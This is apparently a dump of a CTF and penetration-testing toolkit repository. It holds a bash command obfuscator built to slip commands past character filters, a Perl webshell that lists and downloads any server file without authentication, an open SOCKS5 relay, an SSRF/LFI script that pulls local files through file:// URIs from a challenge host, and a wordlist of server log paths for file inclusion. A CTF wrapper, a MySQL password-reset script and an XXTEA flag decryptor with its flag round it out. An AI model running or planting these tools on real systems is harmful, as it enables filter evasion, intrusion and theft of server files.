# docstring.  Entries 0 and 1 come from the positional-parameter count and its
# string length; entries 2-7 derive from those with shell arithmetic (a shift
# and base-prefixed literals).
# Detection note: output of this encoder is dominated by repeated `${##}` and
# nested `$((` ... `#` ... `))` fragments, a combination rare in ordinary scripts.
n = dict()
n[0] = '$#'
n[1] = '${##}'
n[2] = '$(({n1}<<{n1}))'.format(n1=n[1])
n[3] = '$(({n2}#{n1}{n1}))'.format(n2=n[2], n1=n[1])
n[4] = '$(({n2}#{n1}{n0}{n0}))'.format(n2=n[2], n1=n[1], n0=n[0])
n[5] = '$(({n2}#{n1}{n0}{n1}))'.format(n2=n[2], n1=n[1], n0=n[0])
n[6] = '$(({n2}#{n1}{n1}{n0}))'.format(n2=n[2], n1=n[1], n0=n[0])
n[7] = '$(({n2}#{n1}{n1}{n1}))'.format(n2=n[2], n1=n[1])
24 |
25 |
def split(cmd):
    """Tokenise ``cmd`` on spaces, with single quotes grouping spaces into one token.

    Quote characters are consumed (not kept).  The trailing token is always
    appended, so ``split('')`` gives ``['']`` and consecutive spaces produce
    empty tokens.
    """
    argv = []
    buf = []
    quoted = False
    for ch in cmd:
        if ch == '\'':
            quoted = not quoted
        elif ch == ' ' and not quoted:
            argv.append(''.join(buf))
            buf = []
        else:
            buf.append(ch)
    argv.append(''.join(buf))
    return argv
40 |
41 |
def str_to_oct(cmd):
    """Spell ``cmd`` as a ``$'...'`` string of octal escapes whose digits come from the n[] table.

    Each character becomes three zero-padded octal digits, and each digit is
    replaced by the matching n[] expression.
    NOTE(review): relies on Python 2's oct() output ('0101'); Python 3 returns
    '0o101', so lstrip('0') would leave an 'o' and int() would raise.
    """
    s = "$\\'"
    for _ in cmd:
        o = ('%s' % (oct(ord(_)).lstrip('0'))).rjust(3, '0')
        e = '\\\\' + ''.join(n[int(d)] for d in o)
        s += e
    s += "\\'"
    return s
50 |
51 |
def arg_to_cmd(arg):
    """Encode each word of ``arg`` with str_to_oct() and join them inside ``{ ... ,}``."""
    cmd = '{'
    cmd += ','.join(str_to_oct(_) for _ in arg)
    cmd += ',}'
    return cmd
57 |
58 |
def encode(cmd):
    """Return ``cmd`` rewritten using only the characters named in the module docstring.

    The command is wrapped as ``bash -c '<cmd>'``, split into words, each word
    encoded by str_to_oct(), and the result fed through a here-string to the
    ``${!#}`` expansion.  Input and output (with the output's byte length) are
    logged via pwntools' log.
    """
    log.info('cmd: `{}`'.format(cmd))
    bash = '${!#}'
    cmd = "bash -c '{}'".format(cmd)
    exp = "%s<<<%s" % (bash, arg_to_cmd(split(cmd)))
    log.info('result ({} byte): {}'.format(len(exp), exp))
    return exp
66 |
67 |
def execute(bashfuck):
    """Self-test: run the encoded string in a local /bin/bash and log what it printed.

    Output is collected up to the GGGGGGGG marker echoed just before ``exit``;
    pwntools logging is quietened around process start and close.
    """
    with context.local(log_level='ERROR'):
        r = process('/bin/bash')
    r.sendline(bashfuck)
    r.sendline('echo GGGGGGGG; exit')
    log.info(r.recvuntil('GGGGGGGG', drop=True).strip())
    with context.local(log_level='ERROR'):
        r.close()
76 |
77 |
# Command-line entry point: encode the positional `cmd`; with -t/--test also
# run the result through a local bash (see execute()).
if __name__ == '__main__':
    parser = argparse.ArgumentParser(prog=sys.argv[0],
                                     description="encode a bash command with charset $,(,),#,!,{,},<,\\,'")
    parser.add_argument('cmd')
    parser.add_argument('-t', '--test', action='store_true',
                        help='test bashfuck and output result')
    args = parser.parse_args()

    if args.test:
        execute(encode(args.cmd))
    else:
        encode(args.cmd)
90 |
--------------------------------------------------------------------------------
/wrapper/wrapper_socket.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #define BUFSIZE 1000
10 | #define SOCK_PATH "/tmp/wrapper"
11 |
12 | char *buf;
13 |
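/* SIGCHLD handler: the wrapped child has exited, so the wrapper exits too.
 * Uses _exit() instead of exit() because only async-signal-safe functions
 * may be called from a handler (exit() runs atexit hooks and flushes stdio).
 * Takes the signal number so the prototype matches what signal() expects;
 * the registration in main() is unchanged. */
void quit(int sig)
{
    (void)sig;
    _exit(0);
}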
18 |
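/* SIGALRM handler: the 10-second budget armed in main() expired.  Reports
 * "Times Up!" with write(2) and leaves with _exit(), both async-signal-safe;
 * the original printf()/fflush()/exit() are not safe inside a handler. */
void timeout(int sig)
{
    static const char msg[] = "Times Up!\n";
    (void)sig;
    (void)write(STDOUT_FILENO, msg, sizeof(msg) - 1);
    _exit(0);
}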
25 |
/*
 * CTF challenge wrapper: forks; the child runs ./applestore with stdin/stdout
 * redirected to a UNIX socket at SOCK_PATH, the parent relays the challenge's
 * I/O to the real stdin/stdout and inspects each input chunk before forwarding
 * it.  The parent exits on SIGCHLD (child gone) or when the 10-second alarm fires.
 *
 * Review notes (behaviour left unchanged here):
 *  - The parent's `addr` is not zeroed before memcpy(), unlike the child's, so
 *    sun_path has no guaranteed NUL terminator and the strlen() used for the
 *    bind() length may read past the copied name.
 *  - read() results are never checked: a -1 or 0 return is passed straight to
 *    write() as the length, and a full BUFSIZE read leaves `buf` (from malloc,
 *    only zeroed after the first forwarded chunk) without a NUL terminator for
 *    the strstr() filter.
 *  - socket()/bind()/listen()/connect() return values are not checked; the
 *    child tests `s == -1` only after connect() has already used it, and a
 *    fork() failure (-1) is treated as the parent path.
 *  - accept() expects a socklen_t* for the address length, not int*.
 */
int main()
{

    int pid;

    buf = (char*) malloc(BUFSIZE);
    int n;

    unlink(SOCK_PATH);
    int s = socket(AF_UNIX, SOCK_STREAM, 0);
    struct sockaddr_un addr;
    memcpy(addr.sun_path, SOCK_PATH, strlen(SOCK_PATH));
    addr.sun_family = AF_UNIX;
    bind(s, (struct sockaddr *)&addr, strlen(addr.sun_path) + sizeof(addr.sun_family));
    listen(s, 5);

    pid = fork();

    if (pid){ //parent
        signal(SIGCHLD, quit);
        signal(SIGALRM, timeout);
        alarm(10);

        struct sockaddr_un child;
        int clen = sizeof(child);
        int cs = accept(s, (struct sockaddr *) &child, &clen);

        if (cs == -1) {
            fprintf(stderr, "server socket fail\n");
            exit(0);
        }

        // get: forward the challenge's first output (banner/prompt) to the user
        n = read(cs, buf, BUFSIZE);
        write(1, buf, n);

        while (1) {
            // hijack input: one chunk of user input is inspected, then forwarded
            n = read(0, buf, BUFSIZE);
            if (strstr(buf, "flag")) { // filter
                fprintf(stderr, "pwn?\n");
                exit(0);
            }

            write(cs, buf, n);
            bzero(buf, BUFSIZE);

            // hijack output: one chunk of challenge output back to the user
            n = read(cs, buf, BUFSIZE);
            write(1, buf, n);
        }

    } else { //child
        int s = socket(AF_UNIX, SOCK_STREAM, 0);
        struct sockaddr_un addr;
        bzero(addr.sun_path, sizeof(addr.sun_path));
        memcpy(addr.sun_path, SOCK_PATH, strlen(SOCK_PATH));
        addr.sun_family = AF_UNIX;
        connect(s, (struct sockaddr *)&addr, strlen(addr.sun_path) + sizeof(addr.sun_family));
        if (s == -1) {
            fprintf(stderr, "cli socket fail\n");
            exit(0);
        }
        // Route the challenge binary's stdin/stdout through the socket.  argv and
        // envp are NULL; if execve() fails the child simply falls through to return 0.
        dup2(s, 0);
        dup2(s, 1);
        execve("./applestore", NULL, NULL);
    }

    return 0;
}
96 |
--------------------------------------------------------------------------------
/webshell/pl-cgi/list.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 | #
3 | # PerlKit-0.1 - http://www.t0s.org
4 | #
5 | # browse.pl: Browse and download files from a webserver
6 |
use strict;

# NOTE(review): CGI file browser/downloader with no authentication and no
# path restriction: the "path" query parameter is used verbatim, so any
# caller can download any file or list any directory readable by the web
# server's account.  Treat it as a webshell component if found on a server.
# The HTML in the print statements was stripped when this listing was
# rendered, which is why several prints look empty.

my ($path, %FORM);

$|=1;    # unbuffer STDOUT so headers and file bytes are flushed as printed


# Get parameters

%FORM = parse_parameters($ENV{'QUERY_STRING'});

if(defined $FORM{'path'}) {
    $path = $FORM{'path'};


} else {
    $path = "/";
}

if(-f $path) { # Download selected file
    print "Content-Type: application/octet-stream\r\n";
    print "\r\n";
    # NOTE(review): on open() failure this prints a message but still falls
    # through to the read loop and close() below.
    open(FILE, "< $path") || print "Could not open file\n";

    # Readline loop over FILE; the angle-bracket filehandle expression was
    # lost in this rendering, so the condition appears empty here.
    while() {
        print;
    }

    close(FILE);
    exit;
}

print "Content-Type: text/html\r\n";
print "\r\n";

print '


Directory ' . $path . ' contents:


';

# Only lists when a path was explicitly supplied; the "/" default is not listed.
if(defined $FORM{'path'}) {

    opendir(DIR, $path) || print "Could not open directory";

    foreach (sort(readdir(DIR))) {
        print get_fileinfo($path, $_). "\n";
    }

    closedir(DIR);

}

print "
";
66 |
# Parse an application/x-www-form-urlencoded query string into a hash.
# '+' becomes a space and %XX sequences are decoded; pairs with an empty
# name are skipped and a repeated name keeps the last value.
# NOTE(review): the %(..) pattern does not require the two characters to be
# hex digits, so malformed escapes are still passed to hex().
sub parse_parameters ($) {
    my %ret;

    my $input = shift;

    foreach my $pair (split('&', $input)) {
        my ($var, $value) = split('=', $pair, 2);

        if($var) {
            $value =~ s/\+/ /g ;
            $value =~ s/%(..)/pack('c',hex($1))/eg;

            $ret{$var} = $value;
        }
    }

    return %ret;
}
85 |
# Build one listing row for $filename inside $dir: name (with a "[D]" marker),
# size, owner and group from stat().  The table markup that framed these
# fields was stripped when this listing was rendered, so the row reads as
# bare values.
# NOTE(review): "[D]" is appended in the non-directory branch, the opposite
# of what the -d test suggests; presumably an artifact of the stripped markup
# (e.g. a download link) rather than a directory marker.
sub get_fileinfo ($$) {
    my $ret;

    my ($dir,$filename) = @_;
    my $file = $dir . "/" . $filename;

    $file=~s/\/+/\//g;    # collapse runs of slashes

    $ret = "
";

    $ret .= "";

    if(-d $file) {
        $file=~s/\/[^\/]+\/\.\./\//g;    # fold "/name/.." back to "/"
        $ret .= "$filename";
    } else {
        $ret .= "$filename [D]" ;
    }
    $ret .= " ";

    my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file);

    $ret .= " ";
    $ret .= "$size ";
    $ret .= "". getpwuid($uid) ." ";    # numeric uid/gid to names; empty if stat() failed
    $ret .= "". getgrgid($gid) ." ";

    $ret .= " ";

    return $ret;
}
117 |
--------------------------------------------------------------------------------
/scripts/reset_mysql_root_password.sh:
--------------------------------------------------------------------------------
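#!/bin/bash
# Reset the MySQL/MariaDB root password on an LNMP install.
#
# Changes relative to the original:
#  * mysqld_safe is started with --skip-networking in addition to
#    --skip-grant-tables, so the unauthenticated window is reachable only over
#    the local socket, not from the network.
#  * The new password is read with `read -s` (no terminal echo) and is no
#    longer printed back at the end.
#  * Backslashes and single quotes in the password are escaped before the
#    value is embedded in the single-quoted SQL string.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH

# Check if user is root
if [ "$(id -u)" != "0" ]; then
    echo "Error: You must be root to run this script!"
    exit 1
fi

echo "+-------------------------------------------------------------------+"
echo "| Reset MySQL/MariaDB root Password for LNMP, Written by Licess |"
echo "+-------------------------------------------------------------------+"
echo "| A tool to reset MySQL/MariaDB root password for LNMP |"
echo "+-------------------------------------------------------------------+"
echo "| For more information please visit https://lnmp.org |"
echo "+-------------------------------------------------------------------+"
echo "| Usage: ./reset_mysql_root_password.sh |"
echo "+-------------------------------------------------------------------+"

# Detect which server is installed; DB_Ver drives the SQL dialect below.
if [ -s /usr/local/mariadb/bin/mysql ]; then
    DB_Name="mariadb"
    DB_Ver=$(/usr/local/mariadb/bin/mysql_config --version)
elif [ -s /usr/local/mysql/bin/mysql ]; then
    DB_Name="mysql"
    DB_Ver=$(/usr/local/mysql/bin/mysql_config --version)
else
    echo "MySQL/MariaDB not found!"
    exit 1
fi

# Prompt until a non-empty password is entered; -s keeps it off the terminal.
while :; do
    DB_Root_Password=""
    read -s -p "Enter New ${DB_Name} root password: " DB_Root_Password
    echo
    if [ "${DB_Root_Password}" = "" ]; then
        echo "Error: Password can't be NULL!!"
    else
        break
    fi
done

# Escape for use inside a single-quoted SQL literal: \ -> \\ and ' -> ''.
SQL_Password=${DB_Root_Password//\\/\\\\}
SQL_Password=${SQL_Password//\'/\'\'}

echo "Stoping ${DB_Name}..."
/etc/init.d/${DB_Name} stop
echo "Starting ${DB_Name} with skip grant tables (local socket only)"
/usr/local/${DB_Name}/bin/mysqld_safe --skip-grant-tables --skip-networking >/dev/null 2>&1 &
sleep 5
echo "update ${DB_Name} root password..."
# ALTER USER for the versions the pattern matches; anything else (including
# releases newer than the pattern) falls into the legacy UPDATE branch, which
# newer servers may reject.
if echo "${DB_Ver}" | grep -Eqi '^8.0.|^5.7.|^10.2.'; then
    /usr/local/${DB_Name}/bin/mysql -u root << EOF
FLUSH PRIVILEGES;
ALTER USER 'root'@'localhost' IDENTIFIED BY '${SQL_Password}';
EOF
else
    /usr/local/${DB_Name}/bin/mysql -u root << EOF
update mysql.user set password = Password('${SQL_Password}') where User = 'root';
EOF
fi

# $? here is the exit status of the mysql client run in the branch above.
if [ $? -eq 0 ]; then
    echo "Password reset succesfully. Now killing mysqld softly"
    killall mysqld
    sleep 5
    echo "Restarting the actual ${DB_Name} service"
    /etc/init.d/${DB_Name} start
    echo "Password for ${DB_Name} root successfully reset"
else
    echo "Reset ${DB_Name} root password failed!"
fi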
69 |
--------------------------------------------------------------------------------
/tools/socks5.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # Python Dynamic Socks5 Proxy
3 | # Usage: python socks5.py 1080
4 | # Background Run: nohup python s5.py 1080 &
5 |
6 | import socket
7 | import sys
8 | import select
9 | import SocketServer
10 | import struct
11 | import time
12 |
13 |
class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    """TCPServer that services each accepted connection on its own thread."""
16 |
17 |
class Socks5Server(SocketServer.StreamRequestHandler):
    """Per-connection SOCKS5 handler: CONNECT only, no authentication.

    NOTE(review): the client greeting is consumed with one recv(262) and always
    answered with "no authentication required" (\\x05\\x00) without inspecting
    the offered methods, so anyone who can reach the listening port can relay
    traffic through this host.  main() binds '' (all interfaces).
    """

    def handle_tcp(self, sock, remote):
        """Relay bytes between the client `sock` and `remote` until either side stops."""
        fdset = [sock, remote]
        while True:
            r, w, e = select.select(fdset, [], [])
            if sock in r:
                # recv() returning '' (peer closed) makes send() return 0 -> leave the loop
                if remote.send(sock.recv(4096)) <= 0:
                    break
            if remote in r:
                if sock.send(remote.recv(4096)) <= 0:
                    break

    def handle(self):
        """Negotiate one SOCKS5 request (RFC 1928 subset) and relay it."""
        try:
            pass # print 'from ', self.client_address nothing to do.
            sock = self.connection
            # 1. Version
            sock.recv(262)
            sock.send("\x05\x00")
            # 2. Request
            data = self.rfile.read(4)
            mode = ord(data[1])
            addrtype = ord(data[3])
            if addrtype == 1: # IPv4
                addr = socket.inet_ntoa(self.rfile.read(4))
            elif addrtype == 3: # Domain name
                addr = self.rfile.read(ord(sock.recv(1)[0]))
            # NOTE(review): any other address type (e.g. 4 = IPv6) leaves `addr`
            # unbound; connect() below then raises UnboundLocalError, which the
            # except clauses at the end (socket.error, IndexError) do not catch.
            port = struct.unpack('>H', self.rfile.read(2))
            reply = "\x05\x00\x00\x01"
            try:
                if mode == 1: # 1. Tcp connect
                    remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    remote.connect((addr, port[0]))
                    pass # print 'To', addr, port[0] nothing do to.
                else:
                    reply = "\x05\x07\x00\x01" # Command not supported
                # NOTE(review): also reached when mode != 1, where `remote` is
                # unbound, so the "command not supported" reply is never sent.
                local = remote.getsockname()
                reply += socket.inet_aton(local[0]) + \
                    struct.pack(">H", local[1])
            except socket.error:
                # Connection refused
                reply = '\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00'
            sock.send(reply)
            # 3. Transfering
            if reply[1] == '\x00': # Success
                if mode == 1: # 1. Tcp connect
                    # `remote` is never closed explicitly after the relay ends.
                    self.handle_tcp(sock, remote)
        except socket.error:
            pass # print 'error' nothing to do .
        except IndexError:
            pass
70 |
71 |
def main():
    """Read the listen port from argv[1] and serve SOCKS5 on every local interface forever."""
    filename = sys.argv[0]
    if len(sys.argv) < 2:
        print('usage: ' + filename + ' port')
        sys.exit()
    socks_port = int(sys.argv[1])
    # '' binds all interfaces; the handler performs no client authentication.
    server = ThreadingTCPServer(('', socks_port), Socks5Server)
    status = 'bind port: %d' % socks_port
    print(status + ' ok!')
    server.serve_forever()
# Script entry point: only runs when executed directly, not when imported.
if __name__ == '__main__':
    main()
83 |
--------------------------------------------------------------------------------
/scripts/xxtea_decrypt.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | // flag{xxtea_1s_1nterest1ng_ha-_-ha}
7 |
8 | #define DELTA 0x9e3779b9 // 2654435769
9 | #define MX (((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z)))
10 |
11 |
12 | void btea(uint32_t *, int, uint32_t const key[4]);
13 | void pack(uint64_t *, uint32_t, uint32_t);
14 | void unpack(uint64_t , uint32_t *, uint32_t *);
15 |
16 | char crypt[300]="\x56\x95\xd7\xfb\x7b\xd5\xb4\x8b\xe6\xd2\xba\xa4\x4c\x71\x52\xa4\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\xba\xcb\xc5\x6d\xa2\x07\x9a\x78\x3b\x62\x5f\x64\xfd\x5e\x02\x03\x3a\x7a\x4c\x9f\x14\xee\xf6\xeb\x3a\x7a\x4c\x9f\x14\xee\xf6\xeb\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x0d\xc8\xb3\x93\x3b\x34\x01\x25\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x5b\xc0\x36\xe1\x62\xa1\x59\xe1\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x18\xb7\x12\xac\x14\x40\x5c\xca\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x0d\xc8\xb3\x93\x3b\x34\x01\x25\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x5b\xc0\x36\xe1\x62\xa1\x59\xe1\xba\xcb\xc5\x6d\xa2\x07\x9a\x78\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\x16\x31\x4b\x54\xef\x95\xa5\x49\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\x1f\x27\x75\xa5\x94\x46\x27\xe3\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\x1f\x27\x75\xa5\x94\x46\x27\xe3\x16\x31\x4b\x54\xef\x95\xa5\x49\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\xd8\xf3\x37\x26\x1f\x46\xff\x17\x5d\x88\x2e\x70\xef\xd7\x12\xb3";
17 |
18 |
/*
 * Decrypts the embedded ciphertext block by block and prints the recovered
 * text (the expected flag is given in the comment near the top of the file).
 *
 * Each 8-byte slice of `crypt` is copied into a uint64_t, split into two
 * 32-bit words, decrypted in place with btea(n = -2), repacked, and the low
 * byte of the result written with putc() -- one output character per slice.
 * NOTE(review): the memcpy()/unpack() split depends on host byte order: on a
 * little-endian host b32_0 holds bytes 4..7 of the slice and b32_1 bytes 0..3,
 * so the byte putc() prints is the low byte of the repacked b32_1.  The
 * sentinel compare against 0x00000000ffffffff only makes sense for the
 * commented-out fread() input path; with the embedded data the loop stops
 * after 35 slices.
 */
int main(int argc, char *argv[])
{
    uint32_t key[4] = {0x342d3221, 0x4320fa22, 0x46257a42, 0x9002bf22};
    uint64_t b64;
    uint32_t b64_split[2];
    int ji=0;

    while (1) {
        if (ji>=35) {
            return 0;
        }
        memcpy(&b64,&crypt[8*ji],8);
        //fread(&b64, sizeof(uint64_t), 1, stdin);
        if (b64 == 0x00000000ffffffff)
            break;
        unpack(b64, &b64_split[0], &b64_split[1]);

        btea(b64_split, -2, key);

        pack(&b64, b64_split[0], b64_split[1]);

        putc(b64, stdout);    /* putc() takes an int: only the low 8 bits are written */

        ji+=1;
    }

    return 0;
}
47 |
48 |
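/* XXTEA (Corrected Block TEA) decryption of n 32-bit words in place.
 *
 * This is the decrypt half of the reference btea(): callers pass the block
 * length as a negative word count (main() uses -2 for one 64-bit block).
 * A non-negative count is now rejected up front: this variant has no encrypt
 * path, and the original computed 52/n after negating, which divides by zero
 * for n == 0 and produces a nonsensical round count for n > 0.
 *
 * v    : n words, decrypted in place
 * n    : negative block length in words; n >= 0 is a no-op
 * key  : 128-bit key as four words
 * The names y, z, sum, p, e and key are referenced by the MX macro. */
void btea(uint32_t *v, int n, uint32_t const key[4])
{
    uint32_t y, z, sum;
    unsigned p, rounds, e;
    if (n >= 0)
        return;
    n = -n;
    rounds = 6 + 52/n;        /* reference round count */
    sum = rounds * DELTA;     /* walk the key schedule backwards from the end */
    y = v[0];
    do {
        e = (sum >> 2) & 3;
        for (p = n - 1; p > 0; p--) {
            z = v[p - 1];
            y = v[p] -= MX;
        }
        z = v[n - 1];
        y = v[0] -= MX;
        sum -= DELTA;
    } while (--rounds);
}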
68 |
69 |
/* Join two 32-bit words into one 64-bit value written through *b64:
 * b32_0 becomes the high half, b32_1 the low half. */
void pack(uint64_t *b64, uint32_t b32_0, uint32_t b32_1)
{
    uint64_t hi = b32_0;
    hi <<= 32;
    *b64 = hi | (uint64_t) b32_1;
}
74 |
75 |
/* Split a 64-bit value into its high (b32_0) and low (b32_1) 32-bit words. */
void unpack(uint64_t b64, uint32_t *b32_0, uint32_t *b32_1)
{
    *b32_1 = (uint32_t) b64;           /* truncation keeps the low 32 bits */
    *b32_0 = (uint32_t) (b64 >> 32);   /* shift brings the high half down */
}
81 |
--------------------------------------------------------------------------------
/tools/ssrf.py:
--------------------------------------------------------------------------------
1 | #!/bin/env python
2 | #-*- encoding: utf-8 -*-
3 |
4 | import requests as req
5 | import base64
6 | import re
7 | import sys
8 | import os
9 |
10 |
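def decode_base64(html):
    """Return the base64 payload of an inline ``data:image/jpeg`` URI ending ``html``.

    Looks for ``data:image/jpeg;base64, <payload>"`` at the end of the text
    and returns the payload; returns ``html`` unchanged when no such URI is
    present.  (Despite the name, nothing is base64-decoded here.)

    Fix: the original pattern captured a single non-space character, so a
    match returned only the last character of the payload; it now captures
    the whole run of non-space characters.

    Args:
        html: response body to search.

    Returns:
        The captured payload, or ``html`` itself when there is no match.
    """
    if 'data:image' not in html:
        return html
    op = re.search(r'data:image/jpeg;base64, (\S+)"$', html)
    if op:
        return op.group(1)
    return html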
20 |
21 |
def get_file(path, ispost=False):
    """Fetch ``url + path`` with GET, or POST ``ispost`` as the form body to ``url``.

    ``ispost`` doubles as the switch and the POST payload: any truthy value is
    sent as ``data=`` and ``path`` is then ignored.  Returns the response body
    on HTTP 200, else False.
    NOTE(review): ``url`` is a module global assigned only under
    ``if __name__ == '__main__'``, so calling this after importing the module
    raises NameError.
    """
    global url
    if ispost:
        res = req.post(url, data=ispost)
    else:
        res = req.get(url + path)
    html = res.content
    if res.status_code == 200: # and 'data:image' in html:
        # print res.url
        return html
    else:
        return False
34 |
35 |
def get_one_file(path, data=False):
    """Request ``path`` and return the body, or '' on failure.

    With ``data`` set, it is used as the form field name and the value is the
    module-global prefix ``p`` joined to ``path``, sent via POST; otherwise the
    empty dict is falsy and get_file() issues a plain GET for ``path``.
    """
    global p
    _data = {}
    if data:
        _data = {
            data: p + path
        }
    html = get_file(path, _data)
    if html:
        # print html
        return html
    else:
        return ''
    # return decode_base64(html)
50 |
51 |
def save_to_file(file_name, file_data, dic_name):
    """Append ``dic_name``, ``file_data`` (each newline-terminated) and a blank line to ``file_name``.

    Nothing is written when ``file_data`` is falsy, but the file is still
    opened in append mode (so it exists afterwards) and its name is printed.
    """
    print(file_name)
    with open(file_name, 'a') as out:
        if file_data:
            out.writelines([dic_name, "\n", file_data, "\n", "\n"])
61 |
62 |
def get_dic(dic):
    """Read wordlist ``dic`` from the sibling ``../dict/`` directory as a list of lines without newlines."""
    with open("../dict/" + dic) as handle:
        return [line.replace('\n', '') for line in handle]
69 |
70 |
def down_file_by_dict(dic_name, tmp, p=False):
    """Request every path listed in wordlist ``dic_name`` and append the results to ``./../tmp/<tmp>``.

    NOTE(review): the parameter ``p`` here is the form field name passed on to
    get_one_file(); it shadows the module-global ``p`` (the path prefix) that
    get_one_file() reads, which is easy to confuse.  ``_dic_name`` is computed
    but never used.
    """
    dics = get_dic(dic_name)
    for dic in dics:
        _dic_name = dic.split("/")
        _dic_name = _dic_name[len(_dic_name) - 1]
        print dic
        save_to_file("./../tmp/" + tmp, get_one_file(dic, p), dic)
        # sys.exit()
79 |
80 |
def down_one_file(file_name, argv, save_dir):
    """Fetch ``file_name`` via get_one_file() and store it under a fixed local directory.

    The output root is hard-coded to the author's machine (/Users/virink/tmp/);
    os.mkdir() creates only the single ``save_dir`` level beneath it.
    """
    save_file = file_name.split("/")[-1]
    if not os.path.exists("/Users/virink/tmp/" + save_dir):
        os.mkdir("/Users/virink/tmp/" + save_dir)
    with open("/Users/virink/tmp/" + save_dir + "/" + save_file, 'w') as f:
        res = get_one_file(file_name, argv)
        print res
        f.write(res)
89 |
# Script entry point.  `url` and `p` are the module globals read by get_file()
# and get_one_file(); they exist only when the file is run directly.  The
# target is a CTF challenge host baked in here; the commented-out lines are
# the author's earlier invocations.
if __name__ == '__main__':
    url = "http://sha4.chal.pwning.xxx/upload"
    p = 'file://'
    argv = 'url'
    # print get_one_file('/etc/apache2/apache2.conf', "url")
    # print get_one_file('/var/www/sha4/server.py', "url")
    # /var/tmp/comments/%s.file
    print get_one_file("/var/tmp/comments/8a9d7c33b323f0fbb3a82c4b9c157380.file", "url")
    # ###############
    # down_one_file('/var/www/sha4/admin.py', 'url', 'pctf_sha4')
    # down_file_by_dict('ssrf&lfi/proc.dic', 'pctf_sha4_proc.log', argv)
101 |
--------------------------------------------------------------------------------
/dict/ssrf/log.dic:
--------------------------------------------------------------------------------
1 | /Program Files/Apache Group/Apache/logs/access.log
2 | /Program Files/Apache Group/Apache/logs/error.log
3 | /apache/logs/access.log
4 | /apache/logs/error.log
5 | /apache2/logs/access.log
6 | /apache2/logs/error.log
7 | /etc/httpd/logs/acces.log
8 | /etc/httpd/logs/acces_log
9 | /etc/httpd/logs/access.log
10 | /etc/httpd/logs/access_log
11 | /etc/httpd/logs/error.log
12 | /etc/httpd/logs/error_log
13 | /etc/logrotate.d/vsftpd.log
14 | /etc/wu-ftpd/ftpaccess
15 | /logs/access.log
16 | /logs/access_log
17 | /logs/error.log
18 | /logs/error_log
19 | /logs/pure-ftpd.log
20 | /opt/lampp/logs/access.log
21 | /opt/lampp/logs/access_log
22 | /opt/lampp/logs/error.log
23 | /opt/lampp/logs/error_log
24 | /opt/xampp/logs/access.log
25 | /opt/xampp/logs/access_log
26 | /opt/xampp/logs/error.log
27 | /opt/xampp/logs/error_log
28 | /usr/local/apache/log
29 | /usr/local/apache/logs
30 | /usr/local/apache/logs/access.log
31 | /usr/local/apache/logs/access_log
32 | /usr/local/apache/logs/error.log
33 | /usr/local/apache/logs/error_log
34 | /usr/local/apache2/logs/access.log
35 | /usr/local/apache2/logs/access_log
36 | /usr/local/apache2/logs/error.log
37 | /usr/local/apache2/logs/error_log
38 | /usr/local/cpanel/logs
39 | /usr/local/cpanel/logs/access_log
40 | /usr/local/cpanel/logs/error_log
41 | /usr/local/cpanel/logs/license_log
42 | /usr/local/cpanel/logs/login_log
43 | /usr/local/cpanel/logs/stats_log
44 | /usr/local/etc/httpd/logs/access_log
45 | /usr/local/etc/httpd/logs/error_log
46 | /usr/local/www/logs/thttpd_log
47 | /var/adm/log/xferlog
48 | /var/apache/logs/access_log
49 | /var/apache/logs/error_log
50 | /var/cpanel/cpanel.config
51 | /var/log/access.log
52 | /var/log/access_log
53 | /var/log/apache-ssl/access.log
54 | /var/log/apache-ssl/error.log
55 | /var/log/apache/access.log
56 | /var/log/apache/access_log
57 | /var/log/apache/error.log
58 | /var/log/apache/error_log
59 | /var/log/apache2/access.log
60 | /var/log/apache2/access_log
61 | /var/log/apache2/error.log
62 | /var/log/apache2/error_log
63 | /var/log/error.log
64 | /var/log/error_log
65 | /var/log/exim/mainlog
66 | /var/log/exim/paniclog
67 | /var/log/exim/rejectlog
68 | /var/log/exim_mainlog
69 | /var/log/exim_paniclog
70 | /var/log/exim_rejectlog
71 | /var/log/ftp-proxy
72 | /var/log/ftp-proxy/ftp-proxy.log
73 | /var/log/ftplog/var/log/httpd/access_log
74 | /var/log/httpd/error_log
75 | /var/log/httpsd/ssl.access_log
76 | /var/log/httpsd/ssl_log
77 | /var/log/maillog
78 | /var/log/mysql.log
79 | /var/log/mysql/mysql-bin.log
80 | /var/log/mysql/mysql-slow.log
81 | /var/log/mysql/mysql.log
82 | /var/log/mysqlderror.log
83 | /var/log/proftpd/var/www/logs/access.log
84 | /var/log/pure-ftpd/pure-ftpd.log
85 | /var/log/pureftpd.log
86 | /var/log/thttpd_log
87 | /var/log/vsftpd.log
88 | /var/log/xferlog
89 | /var/mysql.log
90 | /var/www/log/access_log
91 | /var/www/log/error_log
92 | /var/www/logs/access_log
93 | /var/www/logs/error.log
94 | /var/www/logs/error_log
95 | /var/www/mgr/logs/access.log
96 | /var/www/mgr/logs/access_log
97 | /var/www/mgr/logs/error.log
